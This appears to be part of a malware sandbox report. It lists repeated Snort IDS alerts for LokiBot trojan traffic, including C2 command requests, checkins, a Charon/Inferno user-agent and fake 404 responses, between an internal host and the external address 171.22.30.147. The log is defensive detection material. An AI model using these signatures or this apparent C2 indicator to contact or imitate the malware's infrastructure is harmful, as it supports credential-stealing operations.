            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49703 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49703 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49703 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49703 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49703 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49703
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49704 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49704 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49704 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49704 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49704 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49704
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49705 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49705 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49705 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49705 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49705 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49705
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49706 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49706 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49706 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49706 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49706 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49706
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49707 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49707 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49707 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49707 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49707 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49707
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49708 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49708 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49708 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49708 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49708 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49708
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49709 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49709 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49709 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49709 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49709 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49709
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49710 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49710 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49710 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49710 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49710 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49710
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49711 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49711 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49711 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49711 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49711 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49711
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49712 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49712 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49712 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49712 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49712 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49712
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49713 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49713 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49713 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49713 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49713 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49713
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49714 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49714 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49714 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49714 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49714 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49714
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49715 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49715 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49715 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49715 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49715 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49715
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49716 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49716 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49716 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49716 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49716 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49716
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49717 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49717 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49717 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49717 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49717 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49717
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49718 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49718 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49718 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49718 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49718 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49718
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49719 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49719 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49719 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49719 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49719 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49719
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49720 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49720 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49720 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49720 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49720 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49720
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49721 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49721 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49721 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49721 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49721 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49721
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49722 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49722 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49722 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49722 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49722 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49722
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49723 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49723 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49723 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49723 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49723 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49723
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49724 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49724 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49724 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49724 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49724 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49724
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49725 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49725 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49725 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49725 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49725 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49725
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49726 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49726 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49726 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49726 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49726 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49726
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49727 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49727 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49727 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49727 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49727 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49727
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49728 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49728 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49728 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49728 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49728 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49728
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49729 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49729 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49729 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49729 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49729 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49729
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49730 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49730 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49730 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49730 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49730 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49730
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49731 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49731 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49731 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49731 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49731 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49731
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49732 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49732 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49732 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49732 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49732 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49732
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49733 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49733 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49733 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49733 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49733 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49733
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49734 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49734 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49734 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49734 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49734 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49734
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49735 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49735 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49735 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49735 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49735 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49735
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49736 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49736 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49736 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49736 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49736 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49736
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49737 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49737 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49737 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49737 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49737 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49737
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49738 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49738 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49738 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49738 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49738 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025483 ET TROJAN LokiBot Fake 404 Response 171.22.30.147:80 -> 192.168.2.3:49738
            Source: TrafficSnort IDS: 2024313 ET TROJAN LokiBot Request for C2 Commands Detected M1 192.168.2.3:49739 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2021641 ET TROJAN LokiBot User-Agent (Charon/Inferno) 192.168.2.3:49739 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2025381 ET TROJAN LokiBot Checkin 192.168.2.3:49739 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2024318 ET TROJAN LokiBot Request for C2 Commands Detected M2 192.168.2.3:49739 -> 171.22.30.147:80
            Source: TrafficSnort IDS: 2825766 ETPRO TROJAN LokiBot Checkin M2 192.168.2.3:49739 -> 171.22.30.147:80
